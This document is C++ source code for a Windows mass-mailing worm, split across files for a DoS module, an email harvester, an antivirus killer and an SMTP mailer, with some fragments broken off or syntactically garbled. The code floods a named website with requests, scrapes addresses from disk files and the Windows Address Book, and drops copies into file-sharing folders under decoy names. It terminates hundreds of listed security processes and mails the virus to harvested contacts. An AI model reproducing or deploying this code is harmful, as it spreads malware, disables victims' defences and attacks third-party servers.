int _stdcall WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow)
{
//startup: Windows Socket Library
WSADATA data;
WSAStartup(MAKEWORD(2,0), &data);
bldred_main();
}
DOS.cpp

#define WIN32_LEAN_AND_MEAN //do not add any MFC bullshit

#include <windows.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

#define site "www.kazaa.com" //perform dos on kazaa.com, those damn pirates

#define PORT 80

//connect to the site and send get request

static int connect_c(struct sockaddr_in *addr)
{

SOCKET sock;

sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

connect(sock, (struct sockaddr *)addr, sizeof(struct sockaddr_in));
for(;;)
{
send(sock,"GET / HTTP/1.1\r\n Host: www.kazaa.com\r\n ",1000,0);
Sleep(320);
}
return 0;

}
//ip address resolver. uses gethostbyname api to get ip of site from dns
static unsigned long resolve(char *website)
{
unsigned long addy = inet_addr(website);
if (addy == 0xFFFFFFFF || (addy == 0 && website[0] != '0')) {
struct hostent *host = gethostbyname(website);
if (host != NULL)
addy = *(unsigned long *)host->h_addr_list[0];
}
if (addy == 0xFFFFFFFF) addy = 0;
return addy;
}
//main code for dos attack
int attacksite()
{

struct sockaddr_in addr;

WSADATA data;
WSAStartup(MAKEWORD(2,0), &data);

memset(&addr, '\0', sizeof(addr));

addr.sin_family = AF_INET;
addr.sin_addr.s_addr = resolve(site);
addr.sin_port = htons(PORT);

connect_c(&addr);
return 0;

}
//main thread for dos attack
DWORD _stdcall DOSATTACK(LPVOID th)
{
DOS.cpp

int i;
#define numthreads 100

for(i=1; i<numthreads; i++) //for loop that launches attack thread 100 times
attacksite();
return 0; //just return null

}
Harvester.cpp

#include <stdio.h>
#include <windows.h>
#include "mailer.h"

void massmail_it(char *address)

{

static const char *list[] = {

"@symantec", "@panda", "@avp", "@microsoft",
"@msn", "@sopho", "@mm", "@norman", "@norton", "@noreply", "@virusli", "@fsecure",
"@hotmail", NULL, "\n\n\n" };

register int m;

for (m=0; list[m]; m++)

if (strstr(address, list[m])) return; //mail filter
if(!strstr(address,".")) return;

DWORD tid;

CreateThread(0, 0, mail_it, (char *)address, 0, &tid);

return;

// Opens the file, scans to the end of the file looking for @ sign
// if one is found it backs up to the beginning of addresss
// and grabs the from beginning to end, harvests it then
// passes it through massmail_it
int harvest_textfile(const char *text_file)
{

FILE *fp;
long byte_count = 0L;
long at_count = 0L;
char collected[200];

int ch;
long fpos = 0L;
int idx;

if ( (fp = fopen(text_file, "rb")) == NULL) {

return 0;
}

while ((ch = fgetc(fp)) != EOF) {

if (ch == '@') at_count++;
byte_count++;
}
fclose(fp);

if ( (fp = fopen(text_file, "rb")) == NULL) {

return 0;
}
Harvester.cpp

int valid = 0;
while ((ch = fgetc(fp)) != EOF && (fpos <= byte_count)) {
if (ch == '@') {
at_count++;

fpos = ftell(fp) - 1L;

if (fpos >= 1L) fpos--;

fseek(fp, fpos, 0);
ch = fgetc(fp);

while ( (ch >= 'a' && ch <= 'z') ||

(ch >= 'A' && ch <= 'Z') ||
(ch >= '0' && ch <= '9') ||
(ch == '_' || ch == '-' || ch == '.') ) {

if (fpos == 0) {
rewind(fp);
break;
}
else {
fpos--;
fseek(fp, fpos, 0);
ch = fgetc(fp);
}
if (ch == EOF) fclose(fp);
}

idx = 0;

while ( (ch = fgetc(fp)) != EOF) {

valid = 0;
if (ch >= 'a' && ch <= 'z') valid = 1;
if (ch >= 'A' && ch <= 'Z') valid = 1;
if (ch >= '0' && ch <= '9') valid = 1;
if (ch == '_' || ch == '-') valid = 1;
if (ch == '@' || ch == '.') valid = 1;

if (!valid) break;

collected[idx] = ch;
idx++;

}
collected[idx] = '\0';

massmail_it(collected);
}
}
fclose(fp);
return 0;
}

//Harvests email addresses out of windows address book

/**********************************************
*
*
Harvester.cpp

* Synopsis on Wab address collection:

* Our virus first finds the location of WAB from the registry.
* Create the file mapping. Begin finding email IDs
* File format of WAB is easy to understand
* The number of addresses are stored at the memory location 0x64 and the starting address
* of email addresses are stored at memory location 0x60 .
* Once our virus finds the email addresses the virus Unmaps the mapped WAB file
* by calling UnmapViewOfFile API, then close all opened handles.
*
*
*
**********************************************/
int harvest_wab()
{
HANDLE fhandle1;
BYTE pathw[MAX_PATH];
DWORD sz;
HKEY hkeyresult;
sz=800;
RegOpenKeyEx(HKEY_CURRENT_USER, (LPCTSTR)"Software\\Microsoft\\WAB\\WAB4\\Wab File Name"
, 0,KEY_ALL_ACCESS, &hkeyresult );
RegQueryValueEx (hkeyresult, (LPCTSTR)"",0,0, pathw, &sz ) ;
RegCloseKey(hkeyresult);

fhandle1 = CreateFile ((char *)pathw,GENERIC_READ,FILE_SHARE_READ,

NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
char *buffer=NULL;
HANDLE fhandle2=CreateFileMapping(fhandle1,0,PAGE_READONLY,0,0,0);
if(!fhandle2) {
CloseHandle(fhandle1);
return 0;
}
buffer=(char *)MapViewOfFile(fhandle2,FILE_MAP_READ,0,0,0);
if(!buffer) {
CloseHandle(fhandle2);
CloseHandle(fhandle1);
return 0;
}

int bld;
bld=int(*(buffer+0x64));
DWORD add=MAKELONG(MAKEWORD(*(buffer+0x60),*(buffer+0x61)),
MAKEWORD(*(buffer+0x62),*(buffer+0x63)));
char addressOne[300];
int ii,j=0;
int len;
for (len=0;len<(bld*68);len+=68){
for (ii=0;ii<=68;ii++)
{
addressOne[ii]=*(buffer+add+j+len);
j+=2;
}
addressOne[68]='\0';j=0;

massmail_it(addressOne);

}
CloseHandle (fhandle1);
UnmapViewOfFile(buffer);
CloseHandle (fhandle2);

return 0;
Harvester.cpp

char pathname[256];

void copy_to(char *p2p)

{

char pathname[256];
char p2p2[MAX_PATH];
char p2p3[MAX_PATH];
char p2p4[MAX_PATH];
char p2p5[MAX_PATH];
char p2p6[MAX_PATH];
char p2p7[MAX_PATH];
char p2p8[MAX_PATH];
char p2p9[MAX_PATH];
char p2p10[MAX_PATH];
char p2p11[MAX_PATH];
char p2p12[MAX_PATH];
char p2p13[MAX_PATH];
char p2p14[MAX_PATH];
char p2p15[MAX_PATH];
char p2p16[MAX_PATH];
char p2p17[MAX_PATH];
char p2p18[MAX_PATH];
char p2p19[MAX_PATH];
char p2p20[MAX_PATH];

HMODULE hMe = GetModuleHandle(NULL);

DWORD nRet = GetModuleFileName(hMe, pathname, 256);
strcat(p2p2, p2p);
strcat(p2p3, p2p);
strcat(p2p4, p2p);
strcat(p2p5, p2p);
strcat(p2p6, p2p);
strcat(p2p7, p2p);
strcat(p2p8, p2p);
strcat(p2p9, p2p);
strcat(p2p10, p2p);
strcat(p2p11, p2p);
strcat(p2p12, p2p);
strcat(p2p13, p2p);
strcat(p2p14, p2p);
strcat(p2p15, p2p);
strcat(p2p16, p2p);
strcat(p2p17, p2p);
strcat(p2p18, p2p);
strcat(p2p19, p2p);
strcat(p2p20, p2p);

strcat(p2p, "\\ACDSEE10.exe");
strcat(p2p2, "\\Adobe Photoshop Full Version.exe");
strcat(p2p3, "\\Cisco source code.zip .exe");
strcat(p2p4, "\\WinAmp 6.exe");
strcat(p2p5, "\\WinRAR.exe");
strcat(p2p6, "\\Windows Longhorn Beta.exe");
strcat(p2p7, "\\WINDOWS SOURCE CODE.zip .exe");
strcat(p2p8, "\\jenna jameson screensaver.scr");
strcat(p2p9, "\\Opera Registered version.exe");
Harvester.cpp

strcat(p2p10, "\\Snood new version.exe");

strcat(p2p11, "\\Brianna banks and jenna jameson.mpeg .exe");
strcat(p2p12, "\\Norton AntiVirus 2004.exe");
strcat(p2p13, "\\Battlefield 1942.exe");
strcat(p2p14, "\\NETSKY SOURCE CODE.zip .exe");
strcat(p2p15, "\\Kazaa Lite.zip .exe");
strcat(p2p16, "\\Windows crack.zip .exe");
strcat(p2p17, "\\Teen Porn.mpeg .exe");
strcat(p2p18, "\\Britney spears naked.jpeg .exe");
strcat(p2p19, "\\DVD Xcopy xpress.exe");
strcat(p2p20, "\\Visual Studio.NET.zip
.exe");

CopyFile(pathname,p2p,0);
CopyFile(pathname,p2p2,0);
CopyFile(pathname,p2p3,0);
CopyFile(pathname,p2p4,0);
CopyFile(pathname,p2p5,0);
CopyFile(pathname,p2p6,0);
CopyFile(pathname,p2p7,0);
CopyFile(pathname,p2p8,0);
CopyFile(pathname,p2p9,0);
CopyFile(pathname,p2p10,0);
CopyFile(pathname,p2p11,0);
CopyFile(pathname,p2p12,0);
CopyFile(pathname,p2p13,0);
CopyFile(pathname,p2p14,0);
CopyFile(pathname,p2p15,0);
CopyFile(pathname,p2p16,0);
CopyFile(pathname,p2p17,0);
CopyFile(pathname,p2p18,0);
CopyFile(pathname,p2p19,0);
CopyFile(pathname,p2p20,0);

}
//copy to folders containing "shar"
void p2p_in(char *path)
{
CharLower(path);
if (strstr(path,"shar")) {
copy_to(path);
}
else {
return;
}

void harvest_extensions(const char *destination, WIN32_FIND_DATA *finder)

{
char Extension[MAX_PATH];
int e, o;

for (e=0,o=-1; finder->cFileName[e] && (e < 255); e++)

if (finder->cFileName[e] == '.') o=e;

if (o < 0) {
Extension[0] = 0;
Harvester.cpp

} else {
lstrcpyn(Extension, finder->cFileName+o+1, sizeof(Extension)-1);
CharLower(Extension);
}

do {

e = 1;

if (lstrcmp(Extension, "html") == 0) break;

if (lstrcmp(Extension, "htm") == 0) break;
if (lstrcmp(Extension, "txt") == 0) break;
if (lstrcmp(Extension, "xml") == 0) break;
if (lstrcmp(Extension, "doc") == 0) break;
if (lstrcmp(Extension, "rtf") == 0) break;
if (lstrcmp(Extension, "jsp") == 0) break;
if (lstrcmp(Extension, "asp") == 0) break;
if (lstrcmp(Extension, "jsp") == 0) break;
if (lstrcmp(Extension, "adb") == 0) break;
if (lstrcmp(Extension, "dbx") == 0) break;

e = 0;

if (Extension[0] == 0)

e = 0;
return;
}

while (0);

if (e == 1) {
harvest_textfile(destination);
}

int recursive(const char *path, int max_level)

{
char buffer[280];
WIN32_FIND_DATA data;
HANDLE finder;

if ((max_level <= 0) || (path == NULL)) return 1;

if (path[0] == 0) return 1;

strcpy(buffer, path);
if (buffer[strlen(buffer)-1] != '\\') strcat(buffer, "\\");
strcat(buffer, "*.*");

memset(&data, 0, sizeof(data));

for (finder=0;;)
{
Harvester.cpp

if (finder == 0)

{
finder = FindFirstFile(buffer, &data);
if (finder == INVALID_HANDLE_VALUE) finder = 0;
if (finder == 0)
break;
}
else
{
if (FindNextFile(finder, &data) == 0) break;
}

if (data.cFileName[0] == '.')

{
if (data.cFileName[1] == 0)
continue;
if (data.cFileName[1] == '.')

if (data.cFileName[2] == 0)

continue;
}

lstrcpy(buffer, path);
if (buffer[strlen(buffer)-1] != '\\') strcat(buffer, "\\");
strcat(buffer, data.cFileName);

if ((data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == FILE_ATTRIBUTE_DIRECTORY) {

recursive(buffer, max_level-1 );
p2p_in(buffer); //copy to folders containing "shar"

else
harvest_extensions(buffer,&data);

if (finder != 0) FindClose(finder);

return 0;
}

void harvest_disks()
{
char buffer[MAX_PATH], sysdisk;

memset(buffer, 0, sizeof(buffer));

sysdisk = buffer[0];

strcpy(buffer+1, ":\\");

for (buffer [0] = 'C' ; buffer [0] <'Y'; buffer[0]++)

{
if (buffer[0] == sysdisk) continue;
switch (GetDriveType(buffer)) {
Harvester.cpp

case DRIVE_FIXED:
case DRIVE_RAMDISK:
break;

default:

continue;
}
Sleep(3000);
recursive(buffer, 15);
}
}

void harvest_main()
{

harvest_wab();
harvest_disks();

}
KillProc.cpp

/**************************************
* Kills Antivirus and Firewall associated
* processes.
* Uses basic windows APIs from tlhelp32
* such as: CreateToolhelp32Snapshot
*
*
**************************************/

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <tlhelp32.h>
#include <lm.h>

int KillProcess(const char *);

int endAvSoft()
{
const char *exelst[] = { "AGENTSVR.EXE", "ANTI-TROJAN.EXE","ANTIVIRUS.EXE","ANTS.EXE",
"APIMONITOR.EXE","APLICA32.EXE","APVXDWIN.EXE","ATCON.EXE","ATGUARD.EXE","ATRO55EN.EXE",
"ATUPDATER.EXE","ATWATCH.EXE","AUPDATE.EXE","AUTODOWN.EXE","AUTOTRACE.EXE","AUTOUPDATE.EXE",
"AVCONSOL.EXE","AVGSERV9.EXE","AVLTMAIN.EXE","AVPUPD.EXE","AVSYNMGR.EXE","AVWUPD32.EXE",
"AVXQUAR.EXE","AVprotect9x.exe","Au.exe","BD_PROFESSIONAL.EXE","BIDEF.EXE","BIDSERVER.EXE",
"BIPCP.EXE","BIPCPEVALSETUP.EXE","BISP.EXE","BLACKD.EXE","BLACKICE.EXE","BOOTWARN.EXE",
"BORG2.EXE","BS120.EXE","CDP.EXE","CFGWIZ.EXE","CFIADMIN.EXE","CFIAUDIT.EXE","CFINET.EXE",
"CFINET32.EXE","CLEAN.EXE","CLEANER.EXE","CLEANER3.EXE","CLEANPC.EXE","CMGRDIAN.EXE",
"CMON016.EXE",
"CPD.EXE","CPF9X206.EXE","CPFNT206.EXE","CV.EXE","CWNB181.EXE","CWNTDWMO.EXE","D3dupdate.exe"
,"DEFWATCH.EXE","DEPUTY.EXE","DPF.EXE","DPFSETUP.EXE","DRWATSON.EXE","DRWEBUPW.EXE","ENT.EXE"
,"ESCANH95.EXE","ESCANHNT.EXE","ESCANV95.EXE","EXANTIVIRUS-CNET.EXE","FAST.EXE",
"FIREWALL.EXE","FLOWPROTECTOR.EXE","FP-WIN_TRIAL.EXE","FRW.EXE","FSAV.EXE","FSAV530STBYB.EXE"
,"FSAV530WTBYB.EXE","FSAV95.EXE","GBMENU.EXE","GBPOLL.EXE","GUARD.EXE","HACKTRACERSETUP.EXE",
"HTLOG.EXE","HWPE.EXE","IAMAPP.EXE","IAMAPP.EXE","IAMSERV.EXE","ICLOAD95.EXE","ICLOADNT.EXE",
"ICMON.EXE","ICSSUPPNT.EXE","ICSUPP95.EXE","ICSUPPNT.EXE","IFW2000.EXE","IPARMOR.EXE",
"IRIS.EXE","JAMMER.EXE","KAVLITE40ENG.EXE",
"KAVPERS40ENG.EXE","KERIO-PF-213-EN-WIN.EXE","KERIO-WRL-421-EN-WIN.EXE",
"KERIO-WRP-421-EN-WIN.EXE","KILLPROCESSSETUP161.EXE","LDPRO.EXE","LOCALNET.EXE",
"LOCKDOWN.EXE","LOCKDOWN2000.EXE","LSETUP.EXE","LUALL.EXE","LUCOMSERVER.EXE","LUINIT.EXE",
"MCAGENT.EXE","MCUPDATE.EXE","MFW2EN.EXE","MFWENG3.02D30.EXE","MGUI.EXE","MINILOG.EXE",
"MOOLIVE.EXE","MRFLUX.EXE","MSCONFIG.EXE","MSINFO32.EXE","MSSMMC32.EXE","MU0311AD.EXE",
"NAV80TRY.EXE","NAVAPW32.EXE","NAVDX.EXE","NAVSTUB.EXE","NAVW32.EXE","NC2000.EXE",
"NCINST4.EXE","NDD32.EXE","NEOMONITOR.EXE","NETARMOR.EXE","NETINFO.EXE","NETMON.EXE",
"NETSCANPRO.EXE","NETSPYHUNTER-1.2.EXE","NETSTAT.EXE","NISSERV.EXE","NISUM.EXE","NMAIN.EXE",
"NORTON_INTERNET_SECU_3.0_407.EXE",
"NPF40_TW_98_NT_ME_2K.EXE","NPFMESSENGER.EXE","NPROTECT.EXE","NSCHED32.EXE","NTVDM.EXE",
"NUPGRADE.EXE","NVARCH16.EXE","NWINST4.EXE","NWTOOL16.EXE","OSTRONET.EXE","OUTPOST.EXE",
"OUTPOSTINSTALL.EXE","OUTPOSTPROINSTALL.EXE","PADMIN.EXE","PANIXK.EXE","PAVPROXY.EXE",
"PCC2002S902.EXE","PCC2K_76_1436.EXE","PCCIOMON.EXE","PCDSETUP.EXE","PCFWALLICON.EXE",
"PCIP10117_0.EXE","PDSETUP.EXE","PERISCOPE.EXE","PERSFW.EXE","PF2.EXE","PFWADMIN.EXE",
"PINGSCAN.EXE","PLATIN.EXE","POPROXY.EXE","POPSCAN.EXE","PORTDETECTIVE.EXE","PPINUPDT.EXE",
"PPTBC.EXE","PPVSTOP.EXE","PROCEXPLORERV1.0.EXE","PROPORT.EXE","PROTECTX.EXE","PSPF.EXE",
"PURGE.EXE","PVIEW95.EXE","QCONSOLE.EXE","QSERVER.EXE","RAV8WIN32ENG.EXE","RESCUE.EXE",
"RESCUE32.EXE",
"RRGUARD.EXE","RSHELL.EXE","RTVSCN95.EXE",
"RULAUNCH.EXE","SAFEWEB.EXE","SBSERV.EXE","SD.EXE","SETUPVAMEEVAL.EXE",
"SETUP_FLOWPROTECTOR_US.EXE","SFC.EXE","SGSSFW32.EXE","avserve2.exe","SHELLSPYINSTALL.EXE",
"SHN.EXE","SMC.EXE","SOFI.EXE","SPF.EXE","SPHINX.EXE","SPYXX.EXE","SS3EDIT.EXE","ST2.EXE",
"SUPFTRL.EXE","SUPPORTER5.EXE","SYMPROXYSVC.EXE","SYSEDIT.EXE","TASKMON.EXE","TAUMON.EXE",
"TAUSCAN.EXE","TC.EXE","TCA.EXE","TCM.EXE","TDS-3.EXE","TDS2-98.EXE","TDS2-NT.EXE",
"TFAK5.EXE","TGBOB.EXE","TITANIN.EXE","TITANINXP.EXE","TRACERT.EXE","TRJSCAN.EXE",
"TRJSETUP.EXE","TROJANTRAP3.EXE","UNDOBOOT.EXE","UPDATE.EXE","VBCMSERV.EXE","VBCONS.EXE",
"VBUST.EXE","VBWIN9X.EXE","VBWINNTW.EXE",
KillProc.cpp

"VCSETUP.EXE","VFSETUP.EXE","VIRUSMDPERSONALFIREWALL.EXE","VNLAN300.EXE","VNPC3000.EXE",
"VPC42.EXE","VPFW30S.EXE","VPTRAY.EXE","VSCENU6.02D30.EXE","VSECOMR.EXE","VSHWIN32.EXE",
"VSISETUP.EXE","VSMAIN.EXE","VSMON.EXE","VSSTAT.EXE","VSWIN9XE.EXE","VSWINNTSE.EXE",
"VSWINPERSE.EXE","W32DSM89.EXE","W9X.EXE","WATCHDOG.EXE","WEBSCANX.EXE","WGFE95.EXE",
"WHOSWATCHINGME.EXE","WINRECON.EXE","WNT.EXE","WRADMIN.EXE","WRCTRL.EXE","WSBGATE.EXE",
"WYVERNWORKSFIREWALL.EXE","XPF202EN.EXE","ZAPRO.EXE","ZAPSETUP3001.EXE","ZATUTOR.EXE",
"ZAUINST.EXE","ZONALM2601.EXE","ZONEALARM.EXE","CCAPP.exe", 0 };

register int m;

for (m=0; exelst[m]; m++)

KillProcess(exelst[m]);

return 0;
}

int KillProcess(const char *szToTerminate)

{
BOOL bResult,bResultm;
DWORD aiPID[1000],iCb=1000,iNumProc,iV2000=0;
DWORD iCbneeded,i,iFound=0;
char szName[MAX_PATH],szToTermUpper[MAX_PATH];
HANDLE hProc,hSnapShot,hSnapShotm;
OSVERSIONINFO osvi;
HINSTANCE hInstLib;
int iLen,iLenP,indx;
HMODULE hMod;
PROCESSENTRY32 procentry;
MODULEENTRY32 modentry;
iLenP=strlen(szToTerminate);
if(iLenP<1 || iLenP>MAX_PATH) return 632;
for(indx=0;indx<iLenP;indx++)
szToTermUpper[indx]=toupper(szToTerminate[indx]);
szToTermUpper[iLenP]=0;
BOOL (WINAPI *lpfEnumProcesses)( DWORD *, DWORD cb, DWORD * );
BOOL (WINAPI *lpfEnumProcessModules)( HANDLE, HMODULE *,
DWORD, LPDWORD );
DWORD (WINAPI *lpfGetModuleBaseName)( HANDLE, HMODULE,
LPTSTR, DWORD );
HANDLE (WINAPI *lpfCreateToolhelp32Snapshot)(DWORD,DWORD) ;
BOOL (WINAPI *lpfProcess32First)(HANDLE,LPPROCESSENTRY32) ;
BOOL (WINAPI *lpfProcess32Next)(HANDLE,LPPROCESSENTRY32) ;
BOOL (WINAPI *lpfModule32First)(HANDLE,LPMODULEENTRY32) ;
BOOL (WINAPI *lpfModule32Next)(HANDLE,LPMODULEENTRY32) ;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
bResult=GetVersionEx(&osvi);
if(!bResult)
return 606;
if((osvi.dwPlatformId != VER_PLATFORM_WIN32_NT) &&
(osvi.dwPlatformId != VER_PLATFORM_WIN32_WINDOWS))
return 607;

if(osvi.dwPlatformId==VER_PLATFORM_WIN32_NT)
{
hInstLib = LoadLibraryA("PSAPI.DLL");
if(hInstLib == NULL)
KillProc.cpp

return 605;

lpfEnumProcesses = (BOOL(WINAPI *)(DWORD *,DWORD,DWORD*))

GetProcAddress( hInstLib, "EnumProcesses" ) ;
lpfEnumProcessModules = (BOOL(WINAPI *)(HANDLE, HMODULE *,
DWORD, LPDWORD)) GetProcAddress( hInstLib,
"EnumProcessModules" ) ;
lpfGetModuleBaseName =(DWORD (WINAPI *)(HANDLE, HMODULE,
LPTSTR, DWORD )) GetProcAddress( hInstLib,
"GetModuleBaseNameA" ) ;

if(lpfEnumProcesses == NULL ||
lpfEnumProcessModules == NULL ||
lpfGetModuleBaseName == NULL)
{
FreeLibrary(hInstLib);
return 700;
}

bResult=lpfEnumProcesses(aiPID,iCb,&iCbneeded);
if(!bResult)
{
FreeLibrary(hInstLib);
return 701;
}

iNumProc=iCbneeded/sizeof(DWORD);

for(i=0;i<iNumProc;i++)
{
strcpy(szName,"Unknown");
hProc=OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ,FALSE,
aiPID[i]);
if(hProc)
{
if(lpfEnumProcessModules(hProc,&hMod,sizeof(hMod),&iCbneeded) )
{
iLen=lpfGetModuleBaseName(hProc,hMod,szName,MAX_PATH);
}
}
CloseHandle(hProc);

if(strcmp(strupr(szName),szToTermUpper)==0)

if(strcmp(_strupr(szName),szToTermUpper)==0)

{
iFound=1;
hProc=OpenProcess(PROCESS_TERMINATE,FALSE,aiPID[i]);
if(hProc)
{
if(TerminateProcess(hProc,0))
{
CloseHandle(hProc);
FreeLibrary(hInstLib);
return 0;
}
else
{
KillProc.cpp

CloseHandle(hProc);
FreeLibrary(hInstLib);
return 602;
}
}
else
{
FreeLibrary(hInstLib);
return 604;
}
}
}
}

if(osvi.dwPlatformId==VER_PLATFORM_WIN32_WINDOWS)
{

hInstLib = LoadLibraryA("Kernel32.DLL");
if( hInstLib == NULL )
return 702;

lpfCreateToolhelp32Snapshot=
(HANDLE(WINAPI *)(DWORD,DWORD))
GetProcAddress( hInstLib,
"CreateToolhelp32Snapshot" ) ;
lpfProcess32First=
(BOOL(WINAPI *)(HANDLE,LPPROCESSENTRY32))
GetProcAddress( hInstLib, "Process32First" ) ;
lpfProcess32Next=
(BOOL(WINAPI *)(HANDLE,LPPROCESSENTRY32))
GetProcAddress( hInstLib, "Process32Next" ) ;
lpfModule32First=
(BOOL(WINAPI *)(HANDLE,LPMODULEENTRY32))
GetProcAddress( hInstLib, "Module32First" ) ;
lpfModule32Next=
(BOOL(WINAPI *)(HANDLE,LPMODULEENTRY32))
GetProcAddress( hInstLib, "Module32Next" ) ;
if( lpfProcess32Next == NULL ||
lpfProcess32First == NULL ||
lpfModule32Next == NULL ||
lpfModule32First == NULL ||
lpfCreateToolhelp32Snapshot == NULL )
{
FreeLibrary(hInstLib);
return 703;
}

hSnapShot = lpfCreateToolhelp32Snapshot(
TH32CS_SNAPPROCESS, 0 ) ;
if( hSnapShot == INVALID_HANDLE_VALUE )
{
FreeLibrary(hInstLib);
return 704;
}

procentry.dwSize = sizeof(PROCESSENTRY32);
bResult=lpfProcess32First(hSnapShot,&procentry);
KillProc.cpp

while(bResult)
{

hSnapShotm = lpfCreateToolhelp32Snapshot(
TH32CS_SNAPMODULE, procentry.th32ProcessID) ;
if( hSnapShotm == INVALID_HANDLE_VALUE )
{
CloseHandle(hSnapShot);
FreeLibrary(hInstLib);
return 704;
}

modentry.dwSize=sizeof(MODULEENTRY32);
bResultm=lpfModule32First(hSnapShotm,&modentry);

while(bResultm)
{
if(strcmp(modentry.szModule,szToTermUpper)==0)
{

iFound=1;

hProc=OpenProcess(PROCESS_TERMINATE,FALSE,procentry.th32ProcessID);
if(hProc)
{
if(TerminateProcess(hProc,0))
{

CloseHandle(hSnapShotm);
CloseHandle(hSnapShot);
CloseHandle(hProc);
FreeLibrary(hInstLib);
return 0;
}
else
{

CloseHandle(hSnapShotm);
CloseHandle(hSnapShot);
CloseHandle(hProc);
FreeLibrary(hInstLib);
return 602;
}
}
else
{

CloseHandle(hSnapShotm);
CloseHandle(hSnapShot);
FreeLibrary(hInstLib);
return 604;
}
}
else
{
modentry.dwSize=sizeof(MODULEENTRY32);
bResultm=lpfModule32Next(hSnapShotm,&modentry);
}
}
KillProc.cpp

CloseHandle(hSnapShotm);
procentry.dwSize = sizeof(PROCESSENTRY32);
bResult = lpfProcess32Next(hSnapShot,&procentry);
}
CloseHandle(hSnapShot);
}
if(iFound==0)
{
FreeLibrary(hInstLib);
return 603;
}
FreeLibrary(hInstLib);
return 0;
}
Mailer.cpp

/************************************
*
* Main code for the massmailer.
*
* Integrates the use of dnsapi.dll
* to query the dns to find MX server
* (Mail Exchanger server) of the user
*
* mail_it thread takes one paramater,
* which is the address.
*
*
*
************************************/

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <iphlpapi.h>
#pragma comment(lib, "iphlpapi.lib")
#pragma comment (lib, "ws2_32.lib")
#include <windns.h>
#include <stdlib.h>
#include <iosfwd>
#include <fstream>
#include "MX.h"
#include "Message.h"
#include "ZipIt.h"
using namespace std;

static unsigned long resolve(char *hostname)

{
unsigned long ip = inet_addr(hostname);
if (ip == 0xFFFFFFFF || (ip == 0 && hostname[0] != '0')) {
struct hostent *h = gethostbyname(hostname);
if (h != NULL)
ip = *(unsigned long *)h->h_addr_list[0];
}
if (ip == 0xFFFFFFFF) ip = 0;
return ip;
}

typedef DNS_STATUS (WINAPI *DNSQUERYA)(IN PCSTR pszName, IN WORD wType, IN DWORD Options, IN
PIP4_ARRAY aipServers OPTIONAL, IN OUT PDNS_RECORD *ppQueryResults OPTIONAL, IN OUT PVOID *
pReserved OPTIONAL);

int dns_connect(char *domain, char * toaddress)

{

HINSTANCE hDnsapi;
DNSQUERYA pDnsQuery_A;
DNS_RECORD *pQueryResults, *pQueryRec;
DNS_STATUS statusDns;
char szDnsApi[] = "dnsapi.dll";
hDnsapi = GetModuleHandle(szDnsApi);
if (hDnsapi == NULL) {
hDnsapi = LoadLibrary(szDnsApi);
if (hDnsapi == NULL) return NULL;
}
pDnsQuery_A = (DNSQUERYA)GetProcAddress(hDnsapi, "DnsQuery_A");
Mailer.cpp

if (pDnsQuery_A == NULL) return NULL;

statusDns = pDnsQuery_A(domain, DNS_TYPE_MX, DNS_QUERY_STANDARD, NULL, &pQueryResults,

NULL);
if (statusDns != ERROR_SUCCESS) return NULL;

pQueryRec=pQueryResults;

SOCKADDR_IN SockAddr;

hServer = socket(PF_INET,SOCK_STREAM,0);
if (hServer==INVALID_SOCKET) return FALSE;

SockAddr.sin_addr.s_addr = resolve(pQueryRec->Data.MX.pNameExchange);
SockAddr.sin_family = AF_INET;
SockAddr.sin_port = htons(25);

if (connect(hServer,(PSOCKADDR)&SockAddr,sizeof(SockAddr))) return FALSE;

recvbuff();
sendmail(toaddress);
return 0;
}

/* obtains MX server by recursively, manually, querying user's DNS server */

int mx_get(char *d_omain, char *to_address)
{

int iTimeout = 0;
DWORD iIP;
FIXED_INFO * FixedInfo;
ULONG ulOutBufLen;
DWORD dwRetVal;

FixedInfo = (FIXED_INFO *) GlobalAlloc( GPTR, sizeof( FIXED_INFO ) );

ulOutBufLen = sizeof( FIXED_INFO );
//////////////////////////////
//obtain user's current DNS server

if( ERROR_BUFFER_OVERFLOW == GetNetworkParams( FixedInfo, &ulOutBufLen ) ) {

GlobalFree( FixedInfo );
FixedInfo = (FIXED_INFO *) GlobalAlloc( GPTR, ulOutBufLen );
}

if ( dwRetVal = GetNetworkParams( FixedInfo, &ulOutBufLen ) ) {

iTimeout = 3000;
iIP=resolve(FixedInfo->DnsServerList.IpAddress.String);

printf("\r\n");
MX mx = MxRecursiveGet(d_omain,iIP,iTimeout);

if (!mx.dwNumReplies) {
return 1;
}
Mailer.cpp

hServer = socket(PF_INET,SOCK_STREAM,0);
if (hServer==INVALID_SOCKET) return FALSE;

SOCKADDR_IN SockAddr;
SockAddr.sin_addr.s_addr = resolve(mx.mxReplies->sHostname);
SockAddr.sin_family = AF_INET;
SockAddr.sin_port = htons(25);

if (connect(hServer,(PSOCKADDR)&SockAddr,sizeof(SockAddr))) return FALSE;

recvbuff();
sendmail(to_address);

MxClearBuffer(&mx);

return 0;
}
#define MAX_DOMAIN 80
int mailer(char *address)
{
OSVERSIONINFO osvi;
BOOL bResult;
WSADATA data;
WSAStartup(MAKEWORD(2,0), &data);
char domain[MAX_DOMAIN], *p;
for (p=address; *p && *p != '@'; p++);
if (*p++ != '@') return 0;
lstrcpyn(domain, p, MAX_DOMAIN-1);
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
bResult=GetVersionEx(&osvi); //obtain OS of comp
if(!bResult)
return 606;
if((osvi.dwPlatformId != VER_PLATFORM_WIN32_NT) && //if for some reason not NT,2k,XP or
98,95,ME return
(osvi.dwPlatformId != VER_PLATFORM_WIN32_WINDOWS))
return 607;
if(osvi.dwPlatformId==VER_PLATFORM_WIN32_NT) //if OS is XP,2k or NT use the dnsapi.dll
library to obtain mx server
{
dns_connect(domain,address);

else{

mx_get(domain,address); //otherwise manually query for the MX server

}
return 0;
}

DWORD _stdcall mail_it(LPVOID pv) //mailer thread

{

mailer((char *)pv);
return 0;
}
Message.h

/**************************************
* Purpose:
* Generates Email message and sends
* the recipient the virus
*
* TODO: Add in a mail queue. Chose random
* address from queue and pop it off
* and use it as from address
*
**************************************/

// if there is an error return true so we don't fuck up the massmailing

BOOL chk(int iStatus)
